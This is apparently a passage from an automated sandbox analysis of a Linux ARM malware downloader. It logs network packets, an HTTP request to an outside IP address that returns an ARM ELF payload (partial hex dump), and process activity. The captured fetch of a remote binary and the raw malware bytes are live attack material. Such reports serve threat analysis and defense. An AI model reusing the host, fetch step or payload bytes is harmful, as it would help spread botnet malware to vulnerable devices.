                                                Dec 21, 2024 06:41:57.384301901 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.387592077 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.387645006 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.389277935 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.392298937 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.392353058 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.392575979 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.396900892 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.397022009 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.397567034 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.401565075 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.401721954 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.402550936 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.406320095 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.406542063 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.407531977 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.411012888 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.411099911 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.412524939 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.415640116 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.415774107 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.416268110 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.463604927 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.463723898 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.466007948 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.466871023 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.480103970 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.480139017 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.480813026 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.493719101 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.493751049 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.495234013 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.511121035 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.511280060 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.512092113 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.514465094 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.536386013 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.536422014 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.536458015 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.580427885 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.656047106 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.656080008 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.660382986 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.663166046 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.782836914 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.783000946 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.784111023 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.784239054 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.784964085 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.786572933 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.786690950 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.787662029 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.789125919 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.789261103 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.790422916 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.791738033 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.791800976 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.793708086 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:57.794085026 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:41:57.836374998 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:59.376005888 CET4268680192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:41:59.495824099 CET804268637.44.238.94192.168.2.23
                                                Dec 21, 2024 06:42:00.700031042 CET42836443192.168.2.2391.189.91.43
                                                Dec 21, 2024 06:42:01.723865032 CET4251680192.168.2.23109.202.202.202
                                                Dec 21, 2024 06:42:15.290575027 CET43928443192.168.2.2391.189.91.42
                                                Dec 21, 2024 06:42:27.576586962 CET42836443192.168.2.2391.189.91.43
                                                Dec 21, 2024 06:42:31.671983004 CET4251680192.168.2.23109.202.202.202
                                                Dec 21, 2024 06:42:56.244527102 CET43928443192.168.2.2391.189.91.42
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.234268637.44.238.9480
                                                TimestampBytes transferredDirectionData
                                                Dec 21, 2024 06:41:55.688851118 CET46OUTGET /arm7 HTTP/1.0
                                                Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00
                                                Data Ascii: RAY
                                                Dec 21, 2024 06:41:56.959016085 CET712INHTTP/1.0 200 OK
                                                Accept-Ranges: bytes
                                                Content-Length: 106060
                                                Content-Type: application/octet-stream
                                                Last-Modified: Sat, 21 Dec 2024 03:10:51 GMT
                                                Date: Sat, 21 Dec 2024 05:41:56 GMT
                                                Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 94 81 00 00 34 00 00 00 7c 9b 01 00 02 00 00 04 34 00 20 00 05 00 28 00 12 00 11 00 01 00 00 70 84 89 01 00 84 09 02 00 84 09 02 00 18 01 00 00 18 01 00 00 04 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 9c 8a 01 00 9c 8a 01 00 05 00 00 00 00 80 00 00 01 00 00 00 9c 8a 01 00 9c 8a 02 00 9c 8a 02 00 e8 02 00 00 0c 62 00 00 06 00 00 00 00 80 00 00 07 00 00 00 a0 8a 01 00 a0 8a 02 00 a0 8a 02 00 00 00 00 00 08 00 00 00 04 00 00 00 04 00 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 84 8d 02 00 00 00 00 00 9c 8a 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff [TRUNCATED]
                                                Data Ascii: ELF(4|4 (pbQtd-L@-,@0S 0S/00@/-@0SM88/00S$0S// ---0'>6||G-p `&;p00PP
                                                Dec 21, 2024 06:41:56.959089994 CET1236INData Raw: 01 50 83 c3 00 00 55 e3 01 00 00 0a f0 47 bd e8 1e ff 2f e1 1b 3b 00 eb 01 00 70 e3 00 40 a0 e1 f9 ff ff 0a 00 00 50 e3 06 00 00 1a 24 00 9d e5 7b 3c 00 eb 1d 22 00 eb 09 10 a0 e3 62 22 00 eb 04 00 a0 e1 ee 38 00 eb 27 3c 00 eb 3a 20 00 eb 6c 30
                                                Data Ascii: PUG/;p@P${<"b"8'<: l0P`00S 0S R8 0/P@-@0S
                                                Dec 21, 2024 06:41:56.959126949 CET1236INData Raw: 4d 33 00 eb 00 30 d5 e5 00 20 a0 e1 03 41 80 e7 08 10 a0 e3 07 30 83 e0 07 00 a0 e1 00 30 c5 e5 00 20 86 e5 f4 32 00 eb 00 10 d5 e5 f4 20 9f e5 00 40 a0 e1 07 30 a0 e3 07 10 81 e0 00 00 96 e5 00 20 84 e5 04 30 c4 e5 01 11 a0 e1 3a 33 00 eb 00 30
                                                Data Ascii: M30 A00 2 @0 0:30 A00 2 @0 0'30 A00 2d @0 030A
                                                Dec 21, 2024 06:41:56.959163904 CET1236INData Raw: b2 00 c5 e1 cf ff ff ea 00 60 a0 e3 07 00 56 e1 52 1e a0 e3 64 00 a0 e3 fa ff ff aa 06 51 9a e7 62 0f 00 eb 00 48 a0 e1 24 48 a0 e1 05 00 a0 e1 04 10 a0 e1 81 0f 00 eb 06 01 98 e7 05 10 a0 e1 04 20 a0 e1 01 39 a0 e3 74 2e 00 eb 01 60 86 e2 ed ff
                                                Data Ascii: `VRdQbH$H 9t.`@$,!$<$,0!"< 44<0$O/O-,MP`p11H@D 0
                                                Dec 21, 2024 06:41:56.959203005 CET1236INData Raw: 30 31 83 e0 ff 08 03 e2 23 2c a0 e1 ff 1c 03 e2 20 24 82 e1 01 24 82 e1 03 3c 82 e1 08 00 99 e7 10 10 8d e2 10 20 a0 e3 14 30 8d e5 01 b0 8b e2 97 2c 00 eb 06 00 99 e7 05 10 a0 e1 4d 0e 00 eb 07 00 5b e1 04 90 89 e2 18 a0 8a e2 c8 ff ff 1a 00 40
                                                Data Ascii: 01#, $$< 0,M[@T 99-@ @-8P# Mp# 0 0` .@ :*
                                                Dec 21, 2024 06:41:56.959239006 CET1236INData Raw: 04 00 52 e1 4e 00 00 0a 10 30 9d e5 04 00 53 e1 50 00 00 0a 14 00 9d e5 04 00 50 e1 52 00 00 0a 34 10 9d e5 28 00 85 e2 20 0d 00 eb 14 10 a0 e3 05 00 a0 e1 0f 07 00 eb 00 10 a0 e3 ba 00 c5 e1 0b 20 a0 e1 b0 11 c6 e1 05 00 a0 e1 06 10 a0 e1 db fe
                                                Data Ascii: RN0SPPR4( `` 93, X: 21Cp QR`@$,!$<$,0!"< 44<0
                                                Dec 21, 2024 06:41:56.959280014 CET1236INData Raw: 00 00 68 e0 0a 00 50 e3 d9 00 00 ca 17 ce 8d e2 01 2c a0 e3 00 c0 8d e5 70 10 8d e2 19 ce 8d e2 01 39 a0 e3 09 00 a0 e1 04 c0 8d e5 b2 2a 00 eb 00 20 a0 e1 01 00 72 e3 00 00 a0 e3 7d 00 00 0a 84 41 9d e5 74 31 9d e5 04 00 53 e1 00 10 a0 13 01 10
                                                Data Ascii: hP,p9* r}At1S(RQ,8XU00S,<.,!4 $4$<,P@+00@00PX
                                                Dec 21, 2024 06:41:56.959470034 CET860INData Raw: 01 30 43 e2 07 20 a0 e3 00 80 a0 e1 04 00 a0 e1 01 f9 ff eb 05 10 a0 e1 00 20 a0 e3 02 3c a0 e3 00 70 a0 e1 04 00 a0 e1 fb f8 ff eb 01 20 a0 e3 02 30 a0 e1 3c 00 8d e5 05 10 a0 e1 04 00 a0 e1 f5 f8 ff eb 00 c0 a0 e1 ff c0 0c e2 05 10 a0 e1 13 20
                                                Data Ascii: 0C <p 0< 0@$0` )p$$`0 # )px`(8'HZp
                                                Dec 21, 2024 06:41:56.959505081 CET1236INData Raw: 56 00 00 0a 34 20 9d e5 04 00 52 e1 5d 00 00 0a 38 30 9d e5 04 00 53 e1 5f 00 00 0a 44 40 9d e5 00 00 54 e3 10 30 95 15 10 30 86 15 61 00 00 0a 40 10 9d e5 00 00 51 e3 63 00 00 1a 00 20 a0 e3 ba 20 c5 e1 14 10 a0 e3 05 00 a0 e1 d1 03 00 eb 00 30
                                                Data Ascii: V4 R]80S_D@T00a@Qc 00@ 0@\ 21C@9$ (\0P\@\\0
                                                Dec 21, 2024 06:41:56.959541082 CET1236INData Raw: 04 40 86 e5 a6 ff ff ea 74 1b 00 eb 00 30 90 e5 73 00 53 e3 c3 ff ff 1a 00 30 a0 e3 03 00 a0 e1 04 30 85 e5 f4 19 00 eb 08 00 85 e5 66 ff ff ea 00 00 96 e5 9b 33 00 eb 04 40 86 e5 98 ff ff ea 01 c1 90 e7 10 40 2d e9 02 e1 90 e7 0e c0 8c e0 01 c1
                                                Data Ascii: @t0sS00f3@@-@,l,l,l1,@/O-pMDq@<p
                                                Dec 21, 2024 06:41:57.079051018 CET1236INData Raw: 0a 30 a0 e3 0f 40 a0 e3 00 50 8d e5 d9 fe ff eb 0b 00 a0 e1 03 10 a0 e3 07 20 a0 e3 0b 30 a0 e3 00 40 8d e5 d3 fe ff eb 0b 00 a0 e1 00 10 a0 e3 05 20 a0 e3 0a 30 a0 e3 00 40 8d e5 cd fe ff eb 0b 00 a0 e1 01 10 a0 e3 06 20 a0 e3 0b 30 a0 e3 00 70
                                                Data Ascii: 0@P 0@ 0@ 0p 0` 0PHqpWHqh1lq1pQp1tP1x1|1!2 2


                                                System Behavior

                                                Start time (UTC):05:41:51
                                                Start date (UTC):21/12/2024
                                                Path:/usr/bin/dash
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):05:41:51
                                                Start date (UTC):21/12/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -f /tmp/tmp.Y1zb2WiuS9 /tmp/tmp.ntg6DNPAoh /tmp/tmp.IDcHjvtM8y
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Start time (UTC):05:41:51
                                                Start date (UTC):21/12/2024
                                                Path:/usr/bin/dash
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):05:41:51
                                                Start date (UTC):21/12/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -f /tmp/tmp.Y1zb2WiuS9 /tmp/tmp.ntg6DNPAoh /tmp/tmp.IDcHjvtM8y
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Start time (UTC):05:41:54
                                                Start date (UTC):21/12/2024
                                                Path:/tmp/dlr.arm7.elf
                                                Arguments:/tmp/dlr.arm7.elf
                                                File size:4956856 bytes
                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1